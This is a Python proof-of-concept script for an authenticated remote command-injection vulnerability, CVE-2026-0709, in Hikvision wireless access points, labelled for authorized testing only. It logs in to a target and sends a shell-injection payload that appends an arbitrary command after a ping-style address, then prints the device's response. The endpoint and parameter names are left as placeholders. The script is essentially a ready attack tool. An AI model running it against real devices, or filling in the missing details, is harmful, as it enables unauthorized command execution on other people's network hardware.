#!/usr/bin/env python3
# PoC scanner/exploit skeleton for CVE-2026-0709 (Hikvision APs)
# FOR AUTHORIZED TESTING ONLY

import argparse
import requests
from urllib.parse import urljoin

requests.packages.urllib3.disable_warnings()

def build_base_url(host, port, https=False):
    scheme = "https" if https else "http"
    return f"{scheme}://{host}:{port}/"

def authenticate(base_url, username, password):
    """
    Adjust this to the real Hikvision login mechanism:
    - Could be HTTP basic auth
    - Could be a login form returning a session cookie/token
    """
    session = requests.Session()
    # Example: form-based login (placeholder)
    login_url = urljoin(base_url, "login")
    data = {"username": username, "password": password}
    r = session.post(login_url, data=data, timeout=5, verify=False)
    if r.status_code != 200:
        raise RuntimeError(f"Login HTTP {r.status_code}")
    # TODO: check success condition properly (HTML, JSON, redirect, etc.)
    return session

def exploit_command_injection(session, base_url, cmd):
    """
    This is the core of CVE-2026-0709:
    You must replace:
    - 'vulnerable/path' with the real endpoint
    - 'param' with the actual parameter name
    - HTTP method (GET/POST) and body/headers to match the real bug
    """
    vuln_path = "vulnerable/path"   # e.g. "api/diagnostic/ping"
    url = urljoin(base_url, vuln_path)

    # Example: parameter that gets passed to a shell command on the AP
    inj_payload = f"127.0.0.1; {cmd};"

    data = {
        "param": inj_payload  # replace with real name
    }

    r = session.post(url, data=data, timeout=5, verify=False)
    return r

def main():
    parser = argparse.ArgumentParser(
        description="Hikvision Wireless AP CVE-2026-0709 tester (authenticated RCE)"
    )
    parser.add_argument("--host", required=True, help="Target IP/hostname")
    parser.add_argument("--port", type=int, default=80, help="Target port (default: 80)")
    parser.add_argument("--https", action="store_true", help="Use HTTPS instead of HTTP")
    parser.add_argument("-u", "--user", required=True, help="Username")
    parser.add_argument("-p", "--password", required=True, help="Password")
    parser.add_argument("--cmd", default="id", help="Command to execute (default: id)")

    args = parser.parse_args()

    base_url = build_base_url(args.host, args.port, args.https)

    try:
        print(f"[+] Authenticating to {base_url} as {args.user}")
        session = authenticate(base_url, args.user, args.password)
    except Exception as e:
        print(f"[-] Authentication failed: {e}")
        return

    try:
        print(f"[+] Sending injection payload: {args.cmd}")
        r = exploit_command_injection(session, base_url, args.cmd)
        print(f"[+] HTTP {r.status_code}")
        print("[+] Response body:")
        print(r.text)
    except Exception as e:
        print(f"[-] Exploit request failed: {e}")

if __name__ == "__main__":
    main()